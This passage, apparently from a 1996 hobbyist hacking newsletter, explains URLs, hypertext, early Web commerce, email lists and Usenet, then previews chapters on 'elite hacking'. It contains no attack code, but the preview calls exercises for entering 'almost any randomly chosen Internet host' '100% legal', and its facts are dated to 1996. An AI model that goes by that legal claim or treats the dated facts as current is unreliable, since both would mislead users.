This technique makes it possible to tie together many different documents which may be written by many
people and stored on many different computers around the world into one hypertext document.
This technique is based upon the Universal Resource Locator (URL) standard, which specifies how to hook
up with the computer and access the files within it where the data of a Web page may be stored.
A URL is always of the form http://<rest of address>, where <rest of address> includes a domain name
which must be registered with an organization called InterNIC in order to make sure that two different Web
pages (or email addresses, or computer addresses) don't end up being identical. This registration is one of
the few centralized control features of the Internet.
Here's how the hypertext of the World Wide Web works. The reader would come to a statement such as
"our company offers LTL truck service to all major US cities." If this statement on the "Web page" is
highlighted, that means that a click of the reader's computer mouse will take him or her to a new Web page
with details. These may include complete schedules and a form to fill out to order a pickup and delivery.
Some Web pages even offer ways to make electronic payments, usually through credit cards.
However, the security of money transfers over the Internet is still a major issue. Yet despite concerns with
verifiability of financial transactions, electronic commerce over the Web is growing fast. In its second full
year of existence, 1994, only some $17.6 million in sales were conducted over the Web. But in 1995, sales
reached $400 million. Today, in 1996, the Web is jammed with commercial sites begging for your credit card
information.
In addition, the Web is being used as a tool in the distribution of a new form of currency, known as
electronic cash. It is conceivable that, if the hurdle of verifiability may be overcome, that electronic cash
(often called ecash) may play a major role in the world economy, simplifying international trade. It may also
eventually make national currencies and even taxation as we know it obsolete.
Examples of Web sites where one may obtain ecash include the Mark Twain Bank o f St. Louis, MO
(http://www.marktwain.com) and Digicash of Amsterdam, The Netherlands (http://www.digicash.com).
The almost out-of-control nature of the Internet manifests itself on the World Wide Web. The author of a
Web page does not need to get permis sion or make any arrangement with the authors of other Web pages
to which he or she wishes to establish links. Links may be established automatically simply by programming
in the URLs of desired Web page links.
Conversely, the only way the author of a Web page can prevent other people from reading it or establishing
hypertext links to it is to set up a password protection system (or by not having communications links to the
rest of the Internet).
A problem with the World Wide Web is how to find things on it. Just as anyone may hook a new computer
up to the Internet, so also there is no central authority with control or even knowledge of what is published
where on the World Wide Web. No one needs to ask permission of a central authority to put up a Web
page.
Once a user knows the address (URL) of a Web page, or at least the URL of a Web page that links
eventually to the desired page, then it is possible (so long as communications links are available) to almost
instantly hook up with this page.
Because of the value of knowing URLs, there now are many companies and academic institutions that offer
searchable indexes (located on the Web) to the World Wide Web. Automated programs such as Web
crawlers search the Web and catalog the URLs they encounter as they travel from hypertext link to
hypertext link. But because the Web is constantly growing and changing, there is no way to create a
comprehensive catalog of the entire Web.
Email
Email is the second oldest use of the Internet, dating back to the ARPAnet of 1972. (The first use was to
allow people to remotely log in to their choice of one of the four computers on which ARPAnet was
launched in 1971.)
There are two major uses of email: private communications, and broadcasted email. When broadcasted, ema il
serves to make announcements (one-way broadcasting), and to carry on discussions among groups of
people such as our Happy Hacker list. In the group discussion mode, every message sent by every member
of the list is broadcasted to all other members.
The two most popular program types used to broadcast to email discussion groups are majordomo and
listserv.
Usenet
Usenet was a natural outgrowth of the broadcasted email group discussion list. One problem with email lists
is that there was no easy way for people new to these groups to join them. Another problem is that as the
group grows, a member may be deluged with dozens or hundreds of email messages each day.
In 1979 these problems were addressed by the launch of Usenet. Usenet consists of news groups which
carry on discussions in the form of "posts." Unlike an email discussion group, these posts are stored,
typically for two weeks or so, awaiting potential readers. As new posts are submitted to a news group, they
are broadcast to all Internet hosts that are subscribed to carry the news groups to which these posts
belong.
With many Internet connection programs you can see the similarities between Usenet and email. Both have
similar headers, which track their movement across the Net. Some programs such as Pine are sent up to send
the same message simultaneously to both email addresses and newsgroups. All Usenet news readers allow
you to email the authors of posts, and many also allow you to email these posts themselves to yourself or
other people.
Now, here is a quick overview of the Internet basics we plan to cover in the next several issues of Guide to
(mostly) Harmless Hacking:
1. Unix
We discuss “shells” which allow one to write programs (“scripts”) that automate complicated series of Unix
commands. The reader is introduced to the concept of scripts which perform hacking functions. We
introduce Perl, which is a shell programming language used for the most elite of hacking scripts such as
SATAN.
3. TCP/IP and UUCP
This chapter covers the communications links that bind together the Internet from a hackers' perspective.
Extra attention is given to UUCP since it is so hackable.
4. Internet Addresses, Domain Names and Routers
The reader learns how information is sent to the right places on the Internet, and how hackers can make it go
to the wrong places! How to look up UUCP hosts (which are not under the domain name system) is
included.
5. Fundamentals of Elite Hacking: Ports, Packets and File Permissions
This section lets the genie of serious hacking out of the bottle. It offers a series of exercises in which the
reader can enjoy gaining access to almost any randomly chosen Internet host. In fact, by the end of the
chapter the reader will have had the chance to practice several dozen techniques for gaining entry to other
peoples' computers. Yet these hacks we teach are 100% legal!

LinkWithin

Related Posts Plugin for WordPress, Blogger...

Popular Posts